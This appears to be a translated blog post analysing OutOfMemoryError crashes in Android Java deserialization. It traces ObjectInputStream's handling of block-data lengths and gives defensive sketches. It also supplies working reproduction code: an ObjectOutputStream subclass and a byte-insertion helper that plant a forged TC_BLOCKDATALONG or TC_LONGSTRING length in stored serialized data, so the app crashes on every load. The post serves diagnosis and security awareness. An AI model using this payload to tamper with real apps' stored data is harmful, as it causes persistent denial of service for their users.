Android Security Attacks: The Object Serialization OOM Problem
Source: Internet · Editor: 程序博客网 · Time: 2024/06/06 04:38
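Preface
I recently hit OOM crashes in a project that uses ObjectInputStream/ObjectOutputStream to serialize and deserialize objects. While fixing them I took a brief look at how serialization and deserialization work (via the Serializable interface), and this post records what I found. Along the way I discovered a security risk in persisting serialized data: a malicious modification of the stored data can make the app hit an OOM every time it deserializes.
Usage scenario
1 How the data is used
Persisting: the app first serializes the object into bytes with ObjectOutputStream.writeObject, then encrypts the serialized bytes, and finally writes the encrypted bytes to a file under the app's data directory.
Reading: the app reads the bytes back from the file, decrypts them with the matching algorithm, and finally turns the byte stream back into an object with ObjectInputStream.readObject.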
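The two flows above can be sketched roughly as follows. The post does not say which cipher is used, so AES-GCM is an assumption here, chosen because it also authenticates the data; the class name `SealedStore` and the methods `seal` and `open` are hypothetical, and writing the bytes to a file is left out.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
import java.util.Arrays;
import javax.crypto.Cipher;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.SecretKeySpec;

/** Hypothetical helper: serialize then encrypt on save, decrypt then deserialize on load. */
final class SealedStore {
    private static final int IV_LEN = 12;     // nonce size commonly used with GCM
    private static final int TAG_BITS = 128;  // authentication tag length

    /** Serializes the object and returns IV followed by ciphertext and tag. */
    static byte[] seal(Serializable obj, byte[] key) throws IOException, GeneralSecurityException {
        ByteArrayOutputStream plain = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(plain)) {
            oos.writeObject(obj);
        }
        byte[] iv = new byte[IV_LEN];
        new SecureRandom().nextBytes(iv);
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(key, "AES"),
                new GCMParameterSpec(TAG_BITS, iv));
        byte[] sealed = cipher.doFinal(plain.toByteArray());
        byte[] out = Arrays.copyOf(iv, IV_LEN + sealed.length);
        System.arraycopy(sealed, 0, out, IV_LEN, sealed.length);
        return out;
    }

    /** Verifies and decrypts first, so only authenticated bytes reach readObject. */
    static Object open(byte[] stored, byte[] key)
            throws IOException, GeneralSecurityException, ClassNotFoundException {
        Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
        cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(key, "AES"),
                new GCMParameterSpec(TAG_BITS, stored, 0, IV_LEN));
        byte[] plain = cipher.doFinal(stored, IV_LEN, stored.length - IV_LEN);
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(plain))) {
            return ois.readObject();
        }
    }
}
```

With an authenticated mode, a stored file that was corrupted or modified fails in `doFinal` with a GeneralSecurityException before any byte is handed to ObjectInputStream. A cipher mode without authentication would not give that guarantee.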
2 Problems encountered
With the scheme above, the following two OOM crashes showed up:
(1) OOM 1
java.lang.OutOfMemoryError: Failed to allocate a 942137073 byte allocation with 4194240 free bytes and 487MB until OOM
    at java.io.ObjectInputStream.readBlockDataLong(ObjectInputStream.java:569)
    at java.io.ObjectInputStream.readContent(ObjectInputStream.java:699)
    at java.io.ObjectInputStream.discardData(ObjectInputStream.java:636)
    at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1662)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:657)
    at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1782)
    at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
(2) OOM 2
java.lang.OutOfMemoryError: Failed to allocate a 789137073 byte allocation with 2317152 free bytes and 456MB until OOM
    at java.io.DataInputStream.decodeUTF
    at java.io.DataInputStream.decodeUTF
    at java.io.ObjectInputStream.readContent(ObjectInputStream.java:699)
    at java.io.ObjectInputStream.discardData(ObjectInputStream.java:636)
    at java.io.ObjectInputStream.readNewClassDesc(ObjectInputStream.java:1662)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:657)
    at java.io.ObjectInputStream.readNewObject(ObjectInputStream.java:1782)
    at java.io.ObjectInputStream.readNonPrimitiveContent(ObjectInputStream.java:761)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1983)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:1940)
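Roughly, the stack traces say that while ObjectInputStream.readObject was deserializing an object it tried to allocate about 900 MB (942137073 bytes) in the first case and about 750 MB (789137073 bytes) in the second, which ended in an OOM. The maximum memory the Java layer of an app can allocate is defined by the system property dalvik.vm.heapsize (apps that do not request a large heap are further capped by dalvik.vm.heapgrowthlimit), and the value varies across vendors and devices.
On my test device heapsize is set to 256M, so the VM of each app on that device can allocate at most 256M; once the VM needs more than that, an OutOfMemoryError is thrown. As a side note, many people use catch (Exception) to catch everything, but that does not catch OutOfMemoryError.
OutOfMemoryError inherits from Error, which is a different branch of the hierarchy from Exception, so catching everything including Errors requires catching Throwable.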
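The relevant part of the hierarchy is Throwable → Error → VirtualMachineError → OutOfMemoryError on one branch and Throwable → Exception on the other. The small sketch below illustrates the consequence; `CatchDemo` is a hypothetical name, and the error is thrown by hand so the demo does not have to exhaust the heap.

```java
/** Shows which catch clause actually sees an OutOfMemoryError. */
final class CatchDemo {
    /** Throws a simulated OOM instead of really running out of memory. */
    static void failLikeOom() {
        throw new OutOfMemoryError("simulated");
    }

    /** Returns the name of the catch clause that handled the error. */
    static String caughtBy() {
        try {
            try {
                failLikeOom();
            } catch (Exception e) {
                return "Exception";   // not reached: an Error is not an Exception
            }
        } catch (Throwable t) {
            return "Throwable";       // Errors end up here
        }
        return "nothing";
    }

    public static void main(String[] args) {
        System.out.println(caughtBy());   // prints "Throwable"
    }
}
```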
3 Analysis
3.1 Stack trace analysis
The two OOMs have the same root cause, so the analysis below focuses on OOM 1, the one that ends in ObjectInputStream.readBlockDataLong. Here is that function:
    /**
     * Reads and returns an array of raw bytes with primitive data. The array
     * will have up to 255 bytes. The primitive data will be in the format
     * described by {@code DataOutputStream}.
     *
     * @return The primitive data read, as raw bytes
     *
     * @throws IOException
     *             If an IO exception happened when reading the primitive data.
     */
    private byte[] readBlockData() throws IOException {
        byte[] result = new byte[input.readByte() & 0xff];
        input.readFully(result);
        return result;
    }

    /**
     * Reads and returns an array of raw bytes with primitive data. The array
     * will have more than 255 bytes. The primitive data will be in the format
     * described by {@code DataOutputStream}.
     *
     * @return The primitive data read, as raw bytes
     *
     * @throws IOException
     *             If an IO exception happened when reading the primitive data.
     */
    private byte[] readBlockDataLong() throws IOException {
        byte[] result = new byte[input.readInt()];
        input.readFully(result);
        return result;
    }

Two functions are shown above, readBlockData and readBlockDataLong. Judging by the names they do similar jobs, with readBlockDataLong handling larger amounts of data, and the comments confirm it: readBlockData reads blocks of up to 255 bytes, while readBlockDataLong reads blocks larger than 255 bytes.
Going further up the stack, the caller is ObjectInputStream.readContent:
    /**
     * Reads the content of the receiver based on the previously read token
     * {@code tc}.
     *
     * @param tc
     *            The token code for the next item in the stream
     * @return the object read from the stream
     *
     * @throws IOException
     *             If an IO exception happened when reading the class
     *             descriptor.
     * @throws ClassNotFoundException
     *             If the class corresponding to the object being read could not
     *             be found.
     */
    private Object readContent(byte tc) throws ClassNotFoundException, IOException {
        switch (tc) {
            case TC_BLOCKDATA:
                return readBlockData();
            case TC_BLOCKDATALONG:
                return readBlockDataLong();
            case TC_CLASSDESC:
                return readNewClassDesc(false);
            case TC_OBJECT:
                return readNewObject(false);
            case TC_LONGSTRING:
                return readNewLongString(false);
            case TC_EXCEPTION:
                Exception exc = readException();
                throw new WriteAbortedException("Read an exception", exc);
            case TC_RESET:
                resetState();
                return null;
            default:
                throw corruptStream(tc);
        }
    }
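This function chooses how to read the data that follows based on tc (a token code). That suggests serialization with ObjectInputStream/ObjectOutputStream follows a defined format, in other words a standard. A quick search turns up the specification of the Java serialization stream format:
Grammar for the Stream Format
The specification defines the order in which each part of the serialized form is written and the tc that marks it. This post is about the crash rather than the format itself, so interested readers can study the specification on their own. With this, the cause of the OOM can be roughly located: the data being deserialized contains a TC_BLOCKDATALONG token, which sends deserialization into readBlockDataLong. One level further up the stack are ObjectInputStream.readNewClassDesc and ObjectInputStream.discardData: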
    /**
     * Reads a new class descriptor from the receiver. It is assumed the class
     * descriptor has not been read yet (not a cyclic reference). Return the
     * class descriptor read.
     *
     * @param unshared
     *            read the object unshared
     * @return The {@code ObjectStreamClass} read from the stream.
     *
     * @throws IOException
     *             If an IO exception happened when reading the class
     *             descriptor.
     * @throws ClassNotFoundException
     *             If a class for one of the objects could not be found
     */
    private ObjectStreamClass readNewClassDesc(boolean unshared)
            throws ClassNotFoundException, IOException {
        ObjectStreamClass newClassDesc = readClassDescriptor();
        registerObjectRead(newClassDesc, descriptorHandle, unshared);
        descriptorHandle = oldHandle;
        primitiveData = emptyStream;

        // load class...

        // Consume unread class annotation data and TC_ENDBLOCKDATA
        discardData();
        checkedSetSuperClassDesc(newClassDesc, readClassDesc());
        return newClassDesc;
    }

    /**
     * Reads and discards block data and objects until TC_ENDBLOCKDATA is found.
     *
     * @throws IOException
     *             If an IO exception happened when reading the optional class
     *             annotation.
     * @throws ClassNotFoundException
     *             If the class corresponding to the class descriptor could not
     *             be found.
     */
    private void discardData() throws ClassNotFoundException, IOException {
        primitiveData = emptyStream;
        boolean resolve = mustResolve;
        mustResolve = false;
        do {
            byte tc = nextTC();
            if (tc == TC_ENDBLOCKDATA) {
                mustResolve = resolve;
                return; // End of annotation
            }
            readContent(tc);
        } while (true);
    }

From the comment and code of ObjectInputStream.readNewClassDesc, its main job is to read the class description from the serialized data and load the corresponding class through the classloader; it then calls discardData. According to the comment on discardData, that function reads and consumes data that is not needed, such as class annotation data, until it reaches TC_ENDBLOCKDATA. Here is the definition of TC_BLOCKDATALONG:
    /**
     * Tag to mark a long block of data. The long following this tag
     * indicates the size of the block.
     */
    public static final byte TC_BLOCKDATALONG = (byte) 0x7A;

This tc says that the block that follows is a large one; the int (4 bytes) right after the tc is the length of the block.
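To sum up the cause: when ObjectInputStream.readObject deserializes an object, it reads the class data and loads the class through the classloader, after which ObjectInputStream.discardData tries to consume whatever unneeded data precedes TC_ENDBLOCKDATA. Here it encounters a TC_BLOCKDATALONG token, reads the 4-byte length that follows, and readBlockDataLong then tries to allocate a byte array of that length, which triggers the OOM.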
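The weak spot is that the declared length is trusted before any data has been read: a 4-byte length such as 0x7A7A6767 asks for 2,054,842,215 bytes. A length-checked read could look roughly like the sketch below. This is an illustration only, not how any ObjectInputStream implementation works; `BoundedBlockReader` and `readLongBlock` are hypothetical names, and the check assumes the whole input is already in memory.

```java
import java.io.ByteArrayInputStream;
import java.io.DataInputStream;
import java.io.IOException;
import java.io.StreamCorruptedException;

/** Hypothetical length-checked variant of the long block read. */
final class BoundedBlockReader {
    static final byte TC_BLOCKDATALONG = 0x7A;

    /** Reads one TC_BLOCKDATALONG block, refusing lengths the input cannot satisfy. */
    static byte[] readLongBlock(byte[] data) throws IOException {
        DataInputStream in = new DataInputStream(new ByteArrayInputStream(data));
        if (in.readByte() != TC_BLOCKDATALONG) {
            throw new StreamCorruptedException("not a long block");
        }
        int declared = in.readInt();      // 4-byte length taken from the stream
        int remaining = in.available();   // bytes actually left in the buffer
        if (declared < 0 || declared > remaining) {
            throw new StreamCorruptedException(
                    "declared " + declared + " bytes, only " + remaining + " available");
        }
        byte[] result = new byte[declared];   // bounded by the real input size
        in.readFully(result);
        return result;
    }
}
```

With this check, the five bytes 0x7a 0x7a 0x7a 0x67 0x67 are rejected with a StreamCorruptedException instead of producing a 2 GB allocation.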
3.2 Analyzing the abnormal TC_BLOCKDATALONG data
To see when TC_BLOCKDATALONG is written under normal conditions, look at the serialization side, ObjectOutputStream. Searching ObjectOutputStream.java for TC_BLOCKDATALONG shows that it is used only in the function drain:
    /**
     * Writes buffered data to the target stream. This is similar to {@code
     * flush} but the flush is not propagated to the target stream.
     *
     * @throws IOException
     *             if an error occurs while writing to the target stream.
     */
    protected void drain() throws IOException {
        if (primitiveTypes == null || primitiveTypesBuffer == null) {
            return;
        }

        // If we got here we have a Stream previously created
        int offset = 0;
        byte[] written = primitiveTypesBuffer.toByteArray();
        // Normalize the primitive data
        while (offset < written.length) {
            int toWrite = written.length - offset > 1024 ? 1024
                    : written.length - offset;
            if (toWrite < 256) {
                output.writeByte(TC_BLOCKDATA);
                output.writeByte((byte) toWrite);
            } else {
                output.writeByte(TC_BLOCKDATALONG);
                output.writeInt(toWrite);
            }

            // write primitive types we had and the marker of end-of-buffer
            output.write(written, offset, toWrite);
            offset += toWrite;
        }

        // and now we're clean to a state where we can write an object
        primitiveTypes = null;
        primitiveTypesBuffer = null;
    }
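The function shows that the TC_BLOCKDATALONG marker and the int length field that follows it are written to the output stream together, and that the length never exceeds 1024. When there is more data, it is split into several TC_BLOCKDATALONG blocks of 1024 bytes each. In other words, under normal conditions the length field after TC_BLOCKDATALONG cannot exceed 1024. The conclusion is that the data finally fed to deserialization in the OOM cases was itself bad, and most likely went wrong during storage or decryption.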
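The 1024-byte cap can be checked empirically with the sketch below, which writes raw bytes through a stock ObjectOutputStream and then walks the block headers. It runs on a desktop JDK, whose implementation differs from the Android source quoted above, so treat it as a cross-check rather than proof about the Android code; `BlockLengths` is a hypothetical name.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.List;

/** Lists the block lengths a stock ObjectOutputStream emits for raw primitive data. */
final class BlockLengths {
    static List<Integer> blockLengths(int payloadSize) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bytes)) {
            oos.write(new byte[payloadSize]);   // primitive data only, no objects
        }
        DataInputStream in = new DataInputStream(new ByteArrayInputStream(bytes.toByteArray()));
        in.readInt();                           // skip stream magic and version
        List<Integer> lengths = new ArrayList<>();
        while (in.available() > 0) {
            int tc = in.readUnsignedByte();
            int len;
            if (tc == 0x77) {                   // TC_BLOCKDATA: 1-byte length
                len = in.readUnsignedByte();
            } else if (tc == 0x7A) {            // TC_BLOCKDATALONG: 4-byte length
                len = in.readInt();
            } else {
                throw new IOException("unexpected token 0x" + Integer.toHexString(tc));
            }
            in.skipBytes(len);                  // step over the block payload
            lengths.add(len);
        }
        return lengths;
    }

    public static void main(String[] args) throws IOException {
        System.out.println(blockLengths(3000));
    }
}
```

For a 3000-byte payload every reported length should be at most 1024 and the lengths should add up to 3000, which matches the reasoning that a legitimately written stream never declares a block of hundreds of megabytes.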
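3.3 Reproducing the crash
The analysis above shows that the data fed to deserialization is bad, and that this causes the OOM. Following that thread, look at ObjectOutputStream.writeClassDesc: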
    /**
     * Write a class descriptor {@code classDesc} (an
     * {@code ObjectStreamClass}) to the stream.
     *
     * @param classDesc
     *            The class descriptor (an {@code ObjectStreamClass}) to
     *            be dumped
     * @param unshared
     *            Write the object unshared
     * @return the handle assigned to the class descriptor
     *
     * @throws IOException
     *             If an IO exception happened when writing the class
     *             descriptor.
     */
    private int writeClassDesc(ObjectStreamClass classDesc, boolean unshared) throws IOException {
        if (classDesc == null) {
            writeNull();
            return -1;
        }
        output.writeByte(TC_CLASSDESC);
        writeClassDescriptor(classDesc);
        annotateClass(classToWrite);
        drain(); // flush primitive types in the annotation
        output.writeByte(TC_ENDBLOCKDATA);
        writeClassDesc(classDesc.getSuperclass(), unshared);
        return handle;
    }

    /**
     * Writes optional information for class {@code aClass} to the output
     * stream. This optional data can be read when deserializing the class
     * descriptor (ObjectStreamClass) for this class from an input stream. By
     * default, no extra data is saved.
     *
     * @param aClass
     *            the class to annotate.
     * @throws IOException
     *             if an error occurs while writing to the target stream.
     * @see ObjectInputStream#resolveClass(ObjectStreamClass)
     */
    protected void annotateClass(Class<?> aClass) throws IOException {
        // By default no extra info is saved. Subclasses can override
    }
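This function calls writeClassDescriptor to write the class description to output, then calls annotateClass, and then writes TC_ENDBLOCKDATA as the terminator of the class description. On the reading side, ObjectInputStream.readNewClassDesc calls discardData after reading the class description, and discardData consumes any tokens that sit between the class description and TC_ENDBLOCKDATA.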
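For contrast with what follows, here is a minimal sketch of a well-formed class annotation, written through the public API so that the stream stays valid. It targets a desktop JDK rather than the Android source quoted above, and `TaggingOutputStream`, `AnnotationDemo` and `Point` are hypothetical names.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.io.Serializable;

/** Hypothetical stream that tags every class descriptor with a short annotation. */
final class TaggingOutputStream extends ObjectOutputStream {
    TaggingOutputStream(OutputStream out) throws IOException {
        super(out);
    }

    @Override
    protected void annotateClass(Class<?> cl) throws IOException {
        writeUTF("v1");   // stored as block data between the descriptor and TC_ENDBLOCKDATA
    }
}

final class AnnotationDemo {
    static class Point implements Serializable {
        private static final long serialVersionUID = 1L;
        int x = 3;
    }

    /** Serializes obj, optionally with the annotating stream. */
    static byte[] write(Object obj, boolean annotate) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream oos =
                annotate ? new TaggingOutputStream(bytes) : new ObjectOutputStream(bytes)) {
            oos.writeObject(obj);
        }
        return bytes.toByteArray();
    }

    /** Reads with a plain ObjectInputStream, which skips annotations it does not use. */
    static Object read(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject();
        }
    }
}
```

A plain ObjectInputStream reads the annotated stream back without complaint, because the annotation is an honest block whose declared length matches its content. The problem case is a block header whose length field does not match the data behind it.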
Following this idea, one can subclass ObjectOutputStream and write (TC_BLOCKDATALONG, data length) in annotateClass. When the length written is large, the OOM occurs every time. The code is as follows:
    import android.util.Log;

    import java.io.DataOutputStream;
    import java.io.IOException;
    import java.io.ObjectOutputStream;
    import java.io.OutputStream;
    import java.lang.reflect.Field;

    public class AnObjectOutputStream extends ObjectOutputStream {
        private static final String TAG = "AnObjectOutputStream";

        /**
         * Reproduces the java.io.ObjectInputStream.readBlockDataLong stack.
         * This is the default. TC_BLOCKDATALONG (0x7a) is followed by the
         * 4-byte length 0x7a7a6767.
         */
        private static final byte[] DISCARD_BYTES_LONG_DATA =
                new byte[] { 0x7a, 0x7a, 0x7a, 0x67, 0x67 };

        /**
         * Reproduces the stack
         *   java.io.DataInputStream.decodeUTF
         *   java.io.DataInputStream.decodeUTF
         *   java.io.ObjectInputStream.readNewLongString
         * by starting with TC_LONGSTRING (0x7c).
         */
        private static final byte[] DISCARD_BYTES_LONG_STRING =
                new byte[] { 0x7c, 0x7a, 0x7a, 0x67, 0x67 };

        private DataOutputStream mInnerOutput;
        private boolean mStackBlockData = true;

        public AnObjectOutputStream(OutputStream output) throws IOException {
            super(output);
        }

        /**
         * Call setStackBlockData(false) to reproduce the decodeUTF /
         * readNewLongString stack instead of the readBlockDataLong one.
         */
        public void setStackBlockData(boolean blockData) {
            mStackBlockData = blockData;
        }

        @Override
        protected void annotateClass(Class<?> aClass) throws IOException {
            Log.i(TAG, "annotateClass aClass:" + aClass);
            installOutputStream();
            if (mInnerOutput == null) {
                return;
            }
            // Write the bogus token and length straight into the underlying stream.
            if (mStackBlockData) {
                mInnerOutput.write(DISCARD_BYTES_LONG_DATA);
            } else {
                mInnerOutput.write(DISCARD_BYTES_LONG_STRING);
            }
            Log.i(TAG, "annotateClass write success");
        }

        /** Fetches the private "output" field of ObjectOutputStream via reflection. */
        private void installOutputStream() {
            Object obj = null;
            try {
                Field field = ObjectOutputStream.class.getDeclaredField("output");
                field.setAccessible(true);
                obj = field.get(this);
            } catch (Exception e) {
                e.printStackTrace();
            }
            if (obj == null) {
                Log.i(TAG, "installOutputStream failed");
                return;
            }
            mInnerOutput = (DataOutputStream) obj;
        }
    }

The output member of ObjectOutputStream is private, so reflection is needed. Sure enough, replacing the regular ObjectOutputStream with AnObjectOutputStream produces the OOM on every run. The complete calling code is as follows:
    import com.example.testpopupwindow.stream.AnObjectOutputStream;

    import java.io.ByteArrayInputStream;
    import java.io.ByteArrayOutputStream;
    import java.io.IOException;
    import java.io.ObjectInputStream;
    import java.io.ObjectOutputStream;
    import java.io.Serializable;

    public class SerializeThread extends Thread {
        private static final String TAG = "SerializeThread";

        private Employee mEmployee;

        public void run() {
            mEmployee = Employee.create("test");
            Object obj = null;
            try {
                byte[] serializeRes = serialize();
                obj = unserialize(serializeRes);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }

        private byte[] serialize() throws IOException {
            ByteArrayOutputStream arrOs = new ByteArrayOutputStream();
            ObjectOutputStream oos = new AnObjectOutputStream(arrOs);
            oos.writeObject(mEmployee);
            oos.flush();
            byte[] outArr = arrOs.toByteArray();
            oos.close();
            return outArr;
        }

        private Object unserialize(byte[] serializedata) throws IOException {
            ByteArrayInputStream byteArrayInputStream = null;
            ObjectInputStream objectInputStream = null;
            try {
                byteArrayInputStream = new ByteArrayInputStream(serializedata);
                objectInputStream = new ObjectInputStream(byteArrayInputStream);
                return objectInputStream.readObject();
            } catch (Exception e) {
            }
            return null;
        }

        /**
         * test error....
         */
        public static class Employee implements Serializable {
            String mName;

            /**
             * test error....
             */
            private Employee(String name) {
                mName = name;
            }

            public String toString() {
                return "Employee mName:" + mName;
            }

            public static Employee create(String name) {
                return new Employee(name);
            }
        }
    }
Calling new SerializeThread().start() is enough to trigger the OOM; by default it reproduces the readBlockDataLong stack.
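3.4 Security issue
The OOM above points to a security issue in Serializable-based serialization with ObjectInputStream/ObjectOutputStream. If serialized data produced by the default ObjectOutputStream is stored locally and someone maliciously writes bytes like the ones above at the right position, the app will crash every time it deserializes the modified data. Taking the serialized bytes of the Employee above as input, the code that inserts the bytes is as follows: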
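    // TC_BLOCKDATALONG (0x7a) followed by the 4-byte length 0x7a7a6767
    private byte[] mDiscardBytes = new byte[] { 0x7a, 0x7a, 0x7a, 0x67, 0x67 };

    private byte[] modifyBlockDataSize(byte[] content) {
        // Looks for the first 0x78 (TC_ENDBLOCKDATA). Note that 0x78 is also
        // ASCII 'x', so this naive scan assumes no earlier 0x78 byte occurs,
        // for example inside a class or field name.
        for (int i = 0; i < content.length; i++) {
            if (content[i] == (byte) 0x78) {
                return insertLongBlockData(content, i);
            }
        }
        return null;
    }

    private byte[] insertLongBlockData(byte[] data, int insertPos) {
        byte[] newArray = new byte[data.length + mDiscardBytes.length];
        // bytes before the insertion point
        System.arraycopy(data, 0, newArray, 0, insertPos);
        // the inserted token and length
        System.arraycopy(mDiscardBytes, 0, newArray, insertPos, mDiscardBytes.length);
        // the rest of the original data, starting with 0x78
        System.arraycopy(data, insertPos, newArray, insertPos + mDiscardBytes.length,
                data.length - insertPos);
        return newArray;
    }

After this step the five inserted bytes sit immediately before the first 0x78 byte, and deserializing the modified data makes the app crash with an OOM every time.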
As for why the code looks for 0x78, see ObjectOutputStream.writeClassDesc and ObjectInputStream.readNewClassDesc. After reading the class description, readNewClassDesc calls discardData to read annotation-like data terminated by TC_ENDBLOCKDATA (0x78), and inside discardData a TC_BLOCKDATALONG or TC_LONGSTRING token gets parsed and read. So it is enough to insert a TC_BLOCKDATALONG or TC_LONGSTRING tc plus length bytes right before the 0x78.
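Seen from the defending side, the same layout gives a cheap sanity check: for data written by the default ObjectOutputStream, the byte right after the first class description should be TC_ENDBLOCKDATA. The sketch below walks the description instead of scanning for 0x78. It assumes a desktop JDK and the simple case of a single ordinary (non-proxy) object at the start of the stream; `ClassAnnotationCheck` and its methods are hypothetical names.

```java
import static java.io.ObjectStreamConstants.*;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.DataInputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.StreamCorruptedException;

/** Hypothetical check: is the first class description's annotation section empty? */
final class ClassAnnotationCheck {
    static class Employee implements Serializable {
        private static final long serialVersionUID = 1L;
        String mName = "test";
    }

    static byte[] serialize(Object obj) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bytes)) {
            oos.writeObject(obj);
        }
        return bytes.toByteArray();
    }

    /** Returns the offset at which the first class annotation section starts. */
    static int annotationOffset(byte[] data) throws IOException {
        DataInputStream in = new DataInputStream(new ByteArrayInputStream(data));
        if (in.readShort() != STREAM_MAGIC || in.readShort() != STREAM_VERSION) {
            throw new StreamCorruptedException("bad stream header");
        }
        if (in.readByte() != TC_OBJECT || in.readByte() != TC_CLASSDESC) {
            throw new StreamCorruptedException("expected an object with a new class description");
        }
        in.readUTF();                          // class name
        in.readLong();                         // serialVersionUID
        in.readByte();                         // flags
        int fieldCount = in.readUnsignedShort();
        for (int i = 0; i < fieldCount; i++) {
            int typeCode = in.readByte();
            in.readUTF();                      // field name
            if (typeCode == 'L' || typeCode == '[') {
                byte tc = in.readByte();       // type string of an object or array field
                if (tc == TC_STRING) {
                    in.readUTF();
                } else if (tc == TC_REFERENCE) {
                    in.readInt();
                } else {
                    throw new StreamCorruptedException("unexpected type string token");
                }
            }
        }
        return data.length - in.available();
    }

    /** True when nothing sits between the class description and TC_ENDBLOCKDATA. */
    static boolean annotationIsEmpty(byte[] data) throws IOException {
        int offset = annotationOffset(data);
        return offset < data.length && data[offset] == TC_ENDBLOCKDATA;
    }
}
```

Parsing the description also avoids the ambiguity that 0x78 is the ASCII code of 'x', which may appear inside a class or field name. The check covers only the first class description, so it is a quick filter, not a full validator.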
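3.5 Summary
(2) Using ObjectInputStream/ObjectOutputStream carries a security risk; at the very least, encrypt the serialized data.
(3) When deserializing with ObjectInputStream, catch Throwable so that Errors are included and the app can keep running after an OOM.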